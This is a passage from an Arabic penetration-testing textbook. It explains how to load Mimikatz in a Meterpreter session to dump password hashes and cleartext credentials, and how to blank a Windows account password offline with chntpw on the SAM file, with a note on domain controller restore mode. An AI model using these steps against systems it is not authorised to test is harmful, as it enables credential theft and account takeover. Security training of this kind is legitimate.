‫اﻟﺗﺎﻟﻲ ﺳواء ﻟﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز او ﻟﯾﻧﻛس‬
‫‪http://blog.gentilkiwi.com/mimikatz‬‬ ‫‪or directly‬‬
‫‪https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20140505‬‬
‫ﺗم إﺿﺎﻓﺔ اﻻﺻدار اﻟﺛﺎﻧﻲ ﻟل ‪ meterpreter‬ﻣن ﻗﺑل ‪ rapid7‬ﻟذﻟك ﺳوف ﺗﺣﺗﺎج اﻟﻰ ﺗﺣدﯾث ‪ metasploit‬او ﯾﻣﻛن ﺗﺣﻣﯾل اﻹﺻدار‬
‫اﻟﺛﺎﻧﻲ اﻟﻣﺧﺻص ﻟل ‪ metasploit‬ﻣن ﺧﻼل اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ‪:‬‬
‫‪https://github.com/rapid7/meterpreter/tree/master/source/extensions/kiwi‬‬
‫‪https://github.com/rapid7/metasploit-framework/tree/master/lib/rex/post/meterpreter/extensions/kiwi‬‬
‫‪Loading Mimikatz‬‬

‫ﺑﻌد ‪ exploit‬ﻧﺎﺟﺢ واﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ meterpreter‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ ﻟﻠﺗﺄﻛد ﻣن أن اﻟﺟﻠﺳﺔ )‪(session‬اﻟﺗﻲ ﻧﻌﻣل ﺑﮭﺎ ﺗﻌﻣل ﻣﻊ اﻣﺗﯾﺎزات‬
‫ﻣﺳﺗوى اﻟﻧظﺎم )‪ (System privilege‬ﻟﻛﻲ ﺗﻌﻣل ‪ Mimikatz‬ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫اﻣﺎ إذا ﻛﻧت ﻻ ﺗﻌﻣل ﺑﺎﻣﺗﯾﺎزات ‪ system‬ﻓﯾﻣﻛن اﻟﺗﻧﻘل اﻟﻰ اﻣﺗﯾﺎزات ‪ system‬ﻋن طرﯾﻖ اﺻدار اﻻﻣر ‪ getsystem‬ﻛﺎﻻﺗﻰ‪:‬‬

‫‪ Mimikatz‬ﯾدﻋم اﺑﻧﯾﺔ اﻟوﯾﻧدوز ‪ bit32‬و ‪ .bit64‬ﺑﻌد اﻟﺗرﻗﯾﺔ اﻟﻰ اﻣﺗﯾﺎزات ‪ SYSTEM‬ﻟﻧظﺎم ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﺗﺣﻘﻖ ﻣن ﺑﻧﯾﺔ اﻟﻧظﺎم‪،‬‬
‫ﻣﻊ اﻻﻣر "‪ ."sysinfo‬إذا ﻛﺎﻧت ﺑﻧﯾﺔ اﻟﺟﺎھز ‪ bit64‬ﺛم ﻗﻣت ﺑﺗﺣﻣﯾل ‪ Mimikatz‬ذات اﻟﺑﻧﯾﺔ ‪ bit32‬ﻓﮭذا ﻗد ﯾؤﺛر ﺳﻠﺑﺎ واﻟﺗﻲ ﺳوف ﺗﺳﺑب‬
‫ﺗوﻗف ﻣﻌظم اﻟﻣﯾزات ﻟﺗﻛون ﻏﯾر ﻓﻌﺎﻟﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪361‬‬

‫ﯾﺗﺑﯾن ﻣن ھذا ان ﺑﯾﻧﺔ اﻟﻧظﺎم ھﻲ ‪ bit32‬ﻟذﻟك ﺳوف ﻧﻘوم ﺑﺗﺣﻣﯾل‪ Mimikatz‬اﻟﺧﺎص ﺑﮭذه اﻟﺑﯾﻧﺔ ﺑﺎﺳﺗﺧدام اﻻﻣر ‪ .load mimikatz‬اﻣﺎ‬
‫إذا ﻛﺎﻧت اﻟﺑﻧﯾﮫ‪ bit64‬ﻓﻧﺳﺗﺧدم اﻻﻣر ‪ .load mimikatz.64‬وﯾﻣﻛن ﻋرض اﻷواﻣر اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ ﻋن طرﯾﻖ ‪.help‬‬

‫‪ Metasploit‬ﯾوﻓر ﻟﻧﺎ ﺑﻌض اﻷواﻣر اﻟﻣﺿﻣﻧﺔ اﻟﺗﻲ ﺗﻌرض ﻟﻧﺎ اﻟﻣﯾزة اﻷﻛﺛر ﺷﯾوﻋﺎ ﻓﻲ اﻻﺳﺗﺧدام ﻟل ‪ ، Mimikatz‬وﺗﻔرﯾﻎ اﻟﮭﺎش ووﺛﺎﺋﻖ‬
‫اﻟﺗﻔوﯾض ﻓﻲ ﻧص واﺿﺢ )‪ (dumping hashes and clear text credentials straight‬ﻣﺑﺎﺷرة ﻣن اﻟذاﻛرة‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺈن اﻻﻣر‬
‫"‪ "mimikatz_command‬ﯾﺗﯾﺢ ﻟﻧﺎ اﻟوﺻول اﻟﻛﺎﻣل إﻟﻰ ﻛﺎﻓﺔ ﻣﻣﯾزات ﻓﻲ ‪.Mimikatz‬‬

‫‪Reading Hashes and Passwords from Memory‬‬

‫ﯾﻣﻛﻧﻧﺎ اﺳﺗﺧدام ﻛﻼ ﻣن اﻷواﻣر اﻟﻣدﻣﺟﺔ ﻣن ﻗﺑل ‪ metasploit‬واواﻣر ‪ Mimikatz‬ﻻﺳﺗﺧراج اﻟﮭﺎش و‪ clear-text credentials‬ﻣن‬
‫اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪362‬‬

‫ﺑﻌد اﺳﺗﺧدام اﻻﻣر ‪ msv‬ﯾﻌطﯾك ﻗﺎﺋﻣﮫ ﺑﮭﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھﻧﺎ ﯾﻣﻛﻧك اﻧﺗزاع اﻟﮭﺎش وﻣﺣﺎوﻟﺔ ﻛﺳره‪ ،‬أو ﺗﺷﻐﯾﻠﮫ ﻣن ﺧﻼل ﺟدول ‪rainbow‬‬
‫‪ table‬ﻋﻠﻰ اﻻﻧﺗرﻧت‪ ،‬وﻟﻛن ﻣﺎذا ﻟو ﻟم ﯾﻛن ﻟدﯾﻧﺎ ھذا اﻟﻧوع ﻣن اﻟوﻗت؟‬
‫ﺳﯾﻛون ﻣن اﻟﺟﻣﯾل ﻓﻘط اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدي‪.‬‬
‫ﺣﺳﻧﺎ ﯾﻣﻛن ذﻟك‪ ،‬ﺣﯾث ﯾﻘوم ﻓﻘط اﻟﻣﺳﺗﺧدم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻧظﺎم‪ ،‬ﺣﯾﻧﮭﺎ ﯾﻣﻛﻧك ﻛﺗﺎﺑﺔ اﻻﻣر ‪.kerberos‬‬

‫ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ ﻧﻔس اﻟﻧﺗﯾﺟﺔ أﯾﺿﺎ ﺑﺎﺳﺗﺧدام ‪ wdigest‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻟدﯾك أﯾﺿﺎ "‪ "livessp‬ﺣﯾث ان اﻟﻌدﯾد ﻣن أﻧظﻣﺔ ‪ Win8‬ﺗﺳﺗﺧدم ﺣﺳﺎب اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻻﻋﺗﻣﺎد ﺗﺳﺟﯾل اﻟدﺧول اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ﻣﻊ‬
‫‪Mimikatz‬ﯾﻣﻛﻧك اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﻋﻠﻰ ﺣد ﺳواء اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﺳر ﻟﻠﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮭم‬
‫ﺑﺎﺳﺗﺧدام اﻣر واﺣد‪.‬‬
‫ﯾﻣﻛن أﯾﺿﺎ اﺳﺗﺧدام اﻻﻣر ‪ mimikatz_command‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﺑطرﯾﻘﮫ ﻣﺗﻘدﻣﺔ‬

‫‪Password Resetting: The Building and the Wrecking Ball‬‬


‫ھﻧﺎك ﺧﯾﺎر آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ھذه اﻟﺗﻘﻧﯾﺔ ھﻲ ھﺟوم ﻣﺣﻠﻲ أي ﯾﺗطﻠب اﻟوﺻول اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف )ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ ‪(Live CD‬؛‬
‫وﻋﻠﻰ اﻟرﻏم ﻣن أﻧﮭﺎ ﻓﻌﺎﻟﺔ ﺟدا ﻓﻲ ﻛﺳب ﺻﻼﺣﯾﺎت اﻟوﺻول إﻟﻰ اﻟﮭدف‪ ،‬ﺑل ھو أﯾﺿﺎ ﺻﺎﺧﺑﺔ ﺟدا‪ .‬ﻓﻲ ﺟزء ﺳﺎﺑﻖ‪ ،‬ﻧوﻗﺷت ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﻣرو‪ .‬ﻋﻧدﻣﺎ ﯾﻛون اﻟﻣﮭﺎﺟم ﻗﺎدر ﻋﻠﻰ اﻟوﺻول إﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف ﻟﺑﺿﻊ دﻗﺎﺋﻖ ﻓﻘط‪ ،‬ﻓﺄﻧﮫ ﯾﻛون ﻗﺎدرا ﻋﻠﻰ اﻟﺣﺻول ﻋﻠﻰ ﻧﺳﺧﺔ ﻣن ھﺎش‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻛل اﻷﻣور ﻓﻲ اﻻﻋﺗﺑﺎر‪ ،‬وھذا ﯾﻣﻛن أن ﯾﻛون اﻟﮭﺟوم اﻟﺧﻔﻲ ﺟدا وﯾﺻﻌب اﻛﺗﺷﺎﻓﮭﺎ‪.‬‬

‫‪ Password resetting‬ھو أﺳﻠوب آﺧر اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم أو ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات؛ وﻣﻊ ذﻟك‪ ،‬ھذا اﻷﺳﻠوب ھو أﻗل‬
‫ﺑﻛﺛﯾر ﻣن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻗد ﺗﻛون ﻓﻌﺎﻟﺔ‪ ،‬ﻟﻛن ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﯾﻘﯾن ﻣن أن ﻣﺎﻟك اﻟﻧظﺎم واﻟﻣوظﻔﯾن ﺳوف ﯾﻌرﻓون ان ھﻧﺎك ﻣن‬
‫اﺳﺗوﻟﻰ ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫‪ Password resetting‬ھﻲ ﺗﻘﻧﯾﺔ ﺗﺳﻣﺢ ﻟﻣﮭﺎﺟم ﺑﺎﻟﻛﺗﺎﺑﺔ ﺣرﻓﯾﺎ ﻋﻠﻰ اﻟﻣﻠف ‪ SAM‬وإﻧﺷﺎء ﻛﻠﻣﺔ ﻣرور ﺟدﯾدة ﻷي ﻣﺳﺗﺧدم ﻋﻠﻰ ﻧظﺎم‬
‫وﯾﻧدوز اﻟﺣدﯾﺛﺔ‪ .‬ﯾﻣﻛن ﺗﻧﻔﯾذ ھذه اﻟﻌﻣﻠﯾﺔ دون أن ﯾﻌرف ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ‪ ،‬ﻋﻠﻰ اﻟرﻏم ﻛﻣﺎ ذﻛرت‪ ،‬ﻓﺈﻧﮭﺎ ﺗﺗطﻠب أن ﯾﻛون ﻟدﯾك اﻟوﺻول‬
‫اﻟﻔﻌﻠﻲ إﻟﻰ اﻟﺟﮭﺎز‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪363‬‬

‫ﻛﻣﺎ ھو اﻟﺣﺎل ﻣﻊ ﺟﻣﯾﻊ اﻟﺗﻘﻧﯾﺎت اﻷﺧرى اﻟﺗﻲ ﻧوﻗﺷت ﻓﻲ ھذا اﻟﻛﺗﺎب‪ ،‬ﻣن اﻟﻣﮭم أﯾﺿﺎ أن ﻧﻔﮭم اﻵﺛﺎر اﻟﻣﺗرﺗﺑﺔ ﻋﻠﻰ ھذه اﻟﺗﻘﻧﯾﺔ‪ .‬ﺑﻣﺟرد ﺗﻐﯾﯾر‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻟن ﯾﻛون ھﻧﺎك أي وﺳﯾﻠﺔ ﻻﺳﺗﻌﺎدﺗﮭﺎ‪ .‬ﻋﻧد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬ﻓﻲ اﻟﻣرة اﻟﻘﺎدﻣﺔ ﯾﺣﺎول ﻣﺳﺗﺧدم اﻟدﺧول ﻓﯾرى أن ﺗم‬
‫ﺗﻐﯾﯾر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬
‫ﺑﻐض اﻟﻧظر ﻋن ھذا‪ ،‬ﻓﮭذه ﻻ ﺗزال ﺗﻘﻧﯾﺔ ﻗوﯾﺔ ﺑﺷﻛل ﻻ ﯾﺻدق واﺣد ﯾﻣﻛن أن ﺗﻛون ﻣﻔﯾد ﺟدا ﻣن أﺟل اﻟوﺻول إﻟﻰ ﻧظﺎم‪ .‬ﻟﺗﻧﻔﯾذ إﻋﺎدة ﺗﻌﯾﯾن‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ ،‬وﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﻣﮭﯾد اﻟﻧظﺎم اﻟﮭدف ﻣرة أﺧرى إﻟﻰ ﻛﺎﻟﻲ ‪ DVD‬أو ﻣﺣرك أﻗراص‪ .‬ﺑﻣﺟرد اﻟدﺧول اﻟﻰ اﻟﻧظﺎم اﻟﺑدﯾل‪ ،‬ﻣن‬
‫ﺧﻼل اﻟﺗرﻣﻧﺎل‪ ،‬ﻓﺄﻧك ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗﺣﻣﯾل ﻣﺣرك اﻷﻗراص اﻟﺛﺎﺑﺗﺔ اﻟﻔﻌﻠﯾﺔ ﻟﻠﻧظﺎم اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ .SAM‬ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ‬
‫اﻟﺗﻌﻠﯾﻣﺎت ﻟﺗﻧﻔﯾذ ھذه اﻟﻣﮭﻣﺔ ﻓﻲ ﻣﻘطﻊ ﺳﺎﺑﻖ ﺷرح ﻣن ﻗﺑل‪.‬‬
‫ﻣن ھﻧﺎ‪ ،‬ﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻷﻣر "‪ "chntpw‬ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻟﻣراﺟﻌﺔ اﻟﺧﯾﺎرات اﻟﻛﺎﻣﻠﺔ واﻟﺗﺑدﯾل اﻟﻣﺗوﻓرة‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻷﻣر‬
‫]‪[chntpw –h‬‬ ‫اﻟﺗﺎﻟﻲ‪:‬‬
‫اﻓﺗرض أﻧك ﺗرﯾد إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ ﻣرور اﻟﻣﺳؤول ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ﻹﻧﺟﺎز ھذا‪ ،‬ﯾﻣﻛﻧك إﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#chntpw©–i©/mnt/sda1/WINDOWS/system32/config/SAM‬‬
‫ﻓﻲ اﻷﻣر أﻋﻼه‪ ،‬ﯾﺗم اﺳﺗﺧدام "‪ "chntpw‬ﻟﺑدء ﺑرﻧﺎﻣﺞ إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬واﻟﺗﻌﺑﯾر “‪ "-i‬ﯾﺳﺗﺧدم ﻟﺗﺷﻐﯾل اﻟﺑرﻧﺎﻣﺞ ﻓﻲ ﻗذﯾﻔﺔ ﺗﻔﺎﻋﻠﯾﮫ‬
‫)‪ (interactive‬ﺣﯾث ﯾﺳﻣﺢ ﻟك اﺧﺗﯾﺎر اﺳم اﻟﻣﺳﺗﺧدم اﻟذي ﺗود إﻋﺎدة ﺗﻌﯾﯾﻧﮫ‪ .‬و"‪"mnt/sda1/WINDOWS/system32/config/SAM/‬‬
‫ھو اﻟﻣﺳﺎر اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ SAM‬ﻓﻲ اﻟﺟﮭﺎز اﻟﮭدف‪.‬‬
‫ﺑﻌد ﺗﺷﻐﯾل اﻷﻣر‪ ،‬ﺳﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺳﻣﺢ ﻟك ﺑﺈﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳﺗﺧدم اﻟﻣطﻠوب‪.‬‬
‫ﻛل ﺧطوة ﻣن اﻟﺧطوات ﯾوﺿﻊ ﻣﻌﺎ وﺻف ﻟﮭﺎ؛ ﺑﺑﺳﺎطﺔ ﯾﺟب ﻋﻠﯾك اﺗﺧﺎذ ﺑﺿﻊ ﻟﺣظﺎت ﻟﻘراءة ﻣﺎ ھو ﻣطﻠوب‪ .‬ﺗم ﺗﺻﻣﯾم اﻟﺑرﻧﺎﻣﺞ ﻓﻌﻼ ﻣﻊ‬
‫ﺳﻠﺳﻠﺔ ﻣن اﻹﺟﺎﺑﺎت "اﻻﻓﺗراﺿﯾﺔ" ﻓﻲ ﻣﻌظم اﻟﺣﺎﻻت‪ ،‬ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﻟﺿﻐط ﻋﻠﻰ ﻣﻔﺗﺎح "دﺧول" ﻟﻘﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ‪.‬‬
‫ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪ ،‬ﺑﻌد اﻟﺗﺣﻣﯾل اﻷداة‪ ،‬ﺳﯾطﻠب ﻣﻧك اﻹﺟﺎﺑﺔ ﻋﻠﻰ ﻋدة أﺳﺋﻠﺔ‪.‬‬
‫اﻟﺳؤال اﻷول ﯾطﻠب ﻣﻧك ﻣﺎذا ﺗﻔﻌل "‪[1] What to do‬؟ " ﻓوق اﻟﺳؤال‪ ،‬ﺳﺗﺷﺎھد ﺳﻠﺳﻠﺔ ﻣن اﻟﺧﯾﺎرات ﻟﻼﺧﺗﯾﺎر ﻣن ﺑﯾﻧﮭﺎ‪ .‬ﺑﺑﺳﺎطﺔ إدﺧﺎل‬
‫اﻟرﻗم أو اﻟﺣرف اﻟذي ﯾﺗواﻓﻖ ﻣﻊ اﻟﺧﯾﺎر اﻟذي ﺗرﯾده ﺛم ﺗﻧﻘر ﻋﻠﻰ اﻟﻣﻔﺗﺎح "‪ "Enter‬ﻟﻠﻣﺗﺎﺑﻌﺔ‪ .‬و"]‪ "[1‬ﺑﻌد اﻟﺳؤال ﯾﺷﯾر إﻟﻰ أن اﺧﺗﯾﺎر "‪ "1‬ھو‬
‫اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ‪.‬‬

‫ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا‪ ،‬ﻧﺣن ﻧﺧطط ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب اﻟﻣﺳؤول‪ ،‬وﺣﺗﻰ ﻧﺗﻣﻛن ﻣن ھذا ﻧﻛﺗب ]‪ [1‬او ﻧﻧﻘر ﻓوق ‪ Enter‬ﻟﻘﺑول اﻻﻋداد‬
‫اﻻﻓﺗراﺿﻲ‪ .‬اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ ﯾﻘدم ﻟﻧﺎ ﻗﺎﺋﻣﺔ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗوﻓرة ﻋﻠﻰ اﻟﺟﮭﺎز ‪ Windows‬اﻟﻣﺣﻠﻲ‪ .‬ﯾﻣﻛﻧك ﺗﺣدﯾد اﻟﻣﺳﺗﺧدم اﻟﻣطﻠوب‬
‫ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﺳم اﻟﻣﺳﺗﺧدم ﻛﻣﺎ ھو ﻣﻌروض‪ .‬ﻣرة أﺧرى‪ ،‬ﺳوف ﻧﺳﺗﺧدم اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ "‪ ."Administrator‬ﯾﺑﯾن اﻟﺷﻛل ﻟﻘطﺔ ﻣن‬
‫اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺗﺎﺣﯾن‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪364‬‬

‫اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ‪ ،‬ﯾﻘدم ﻟﻧﺎ ﻣﺧﺗﻠف اﻟﺧﯾﺎرات ﻟﺗﺣرﯾر اﺳم اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪ .‬ﯾرﺟﻰ ﻣﻼﺣظﺔ أﻧﮫ ﻓﻲ‬
‫ھذه اﻟﺧطوة‪ ،‬ﻓﺈﻧك ﻟن ﺗرﻏب ﻓﻲ ﻗﺑول اﻟﺧﯾﺎر اﻻﻓﺗراﺿﻲ!‬

‫ﺑدﻻ ﻣن ﻗﺑول اﻟﺟواب اﻻﻓﺗراﺿﻲ ﻟﮭذه اﻟﺷﺎﺷﺔ‪ ،‬ﻓﮭﻧﺎ ﺑﻌد ﺗﺣدﯾد اﻟﺧﯾﺎر " ‪ " 1‬واﻟﺗﻲ ﺗﻌﻧﻰ ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻓﺑﻌد اﺧﺗﯾﺎرك اﻻﺧﺗﯾﺎر ]‪[1‬‬
‫واﻟﻧﻘر ﻋﻠﻰ ‪ Enter‬واﻻﻧﺗﮭﺎء ﻣن ﻣﺳﺢ ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺳوف ﺗﺣﺻل ﻋﻠﻰ رﺳﺎﻟﺔ‪ "!password cleared " :‬ﻋﻧد ھذه اﻟﻧﻘطﺔ‪ ،‬ﯾﻣﻛﻧك‬
‫إﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻣﺳﺗﺧدم آﺧر أو إدﺧﺎل اﻟرﻣز ]![ ﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ‪ .‬ﻣن اﻟﻣﮭم إﻛﻣﺎل اﻟﺧطوات اﻟﻣﺗﺑﻘﯾﺔ ﻷﻧﮫ ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ‬
‫ﻟم ﯾﺗم ﻛﺗﺎﺑﺔ ﻣﻠف ‪ SAM‬اﻟﺟدﯾدة ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﻓﻲ اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ‪ ،‬أدﺧل " ‪ " q‬ﻹﻧﮭﺎء اﻟﺑرﻧﺎﻣﺞ‪ .‬واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ‬
‫ﺗﺳﺄﻟك ﻋﻣﺎ إذا ﻛﻧت ﺗرﻏب ﻓﻲ إرﺳﺎل اﻟﺗﻐﯾﯾرات إﻟﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﺗﺄﻛد ﻣن إدﺧﺎل " ‪ " y‬ﻓﻲ ھذه اﻟﺧطوة ﺣﯾث أن اﻻﺧﺗﯾﺎر اﻻﻓﺗراﺿﻲ ھﻧﺎ‬
‫)‪.(n‬‬
‫ﻗد ﺗم اﻵن ﻣﺳﺢ ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻣﺳﺗﺧدم اﻟذي اﺧﺗﯾر وأﺻﺑﺢ ﻓﺎرغ‪ .‬ﯾﻣﻛﻧك إﯾﻘﺎف ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻣؤﻗت ﻛﺎﻟﻲ ﺑﺈﺻدار اﻷﻣر " ‪" reboot‬‬
‫وإﺧراج ‪ .DVD‬ﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل‪ ، Windows‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﺣﺳﺎب ﻣن ﺧﻼل ﺗرك ﻛﻠﻣﺔ اﻟﻣرور ﻓﺎرﻏﺔ‪.‬‬
‫ﻣﻊ اﻟﻘﻠﯾل ﻣن اﻟﻣﻣﺎرﺳﺔ‪ ،‬ﻓﺎن ھذه اﻟﻌﻣﻠﯾﺔ ﺑرﻣﺗﮭﺎ‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﻣﮭﯾد ﻛﺎﻟﻲ‪ ،‬وﺗطﮭﯾر ﻛﻠﻣﺔ اﻟﺳر‪ ،‬واﻟﺣﺎﺟﺔ إﻟﻰ وﯾﻧدوز‪ ،‬وﯾﻣﻛن اﻻﻧﺗﮭﺎء ﻣﻧﮭﺎ ﻓﻲ‬
‫أﻗل ﻣن ‪ 5‬دﻗﺎﺋﻖ‪.‬‬

‫‪Resetting a Password on a Domain Controller‬‬

‫‪Windows domain controllers‬ﻻ ﺗﺧزن ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣﺳﺗﺧدﻣﯾن ﻓﻲ اﻟﻣﻠف ‪ ، SAM‬وإﻧﻣﺎ ﻓﻲ ‪.Active Directory‬‬
‫‪ Active Directory‬ﻻ ﯾﻣﻛن ﺗﺣرﯾره ﯾدوﯾﺎ )‪ ، (offline‬ﺑﺣﯾث ﯾﺗم اﺗﺧﺎذ ﻧﮭﺞ ﻣﺧﺗﻠف ﻹﻋﺎدة ﺗﻌﯾﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﯾﻣﻛن ﺗﺷﻐﯾل وﺣدة ﺗﺣﻛم‬
‫اﻟدوﻣﯾن ‪ Windows domain controllers‬دون ﺧدﻣﺔ ‪ Active Directory‬وﺗﺳﻣﻰ )‪.(Active Directory Restore Mode‬‬
‫وﻋﺎدة ﻣﺎ ﯾﺗم ذﻟك ﻟﺻﯾﺎﻧﺔ ‪ Active Directory‬أو ‪ .defragmentation‬ﻋﻧدﻣﺎ ﻟم ﯾﺗم ﺗﺣﻣﯾل ‪ ،Active Directory‬ﻓﺎن وﺣدة ﺗﺣﻛم‬
‫اﻟدوﻣﯾن )‪ (Windows domain controllers‬ﺗﻌود ﻣؤﻗﺗﺎ إﻟﻰ ﻣﺻﺎدﻗﺔ اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ وﺳوف ﺗﺳﺗﺧدم ﻣرة أﺧرى اﻟﻣﻠف ‪SAM‬‬
‫اﻟﻣوﺟودة ﻋﻠﻰ اﻟﺟﮭﺎز‪ .‬وﻋﻧدھﺎ ﻣن اﻟﻣﻣﻛن إﻧﺷﺎء ھﺟوم ﻣﺣﺗﻣل ﻣﺗﺟﮫ ﯾﻛون ﻹﻋﺎدة ‪ /‬ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﻟﻠﻣﺳؤول اﻟﻣﺣﻠﻲ ﻟوﺣدة ﺗﺣﻛم اﻟدوﻣﯾن‬
‫)ﻋن طرﯾﻖ اﻟﺗﻼﻋب ‪ SAM‬أو ‪ (dumping‬وﻣن ﺛم ﺗﺣﻣﯾل ھذا اﻻﻣر اﻟﻰ ‪ Active Directory‬اﻟﻣوﺟود ﻓﻲ اﻟوﺿﻊ ‪Restore Mode‬‬
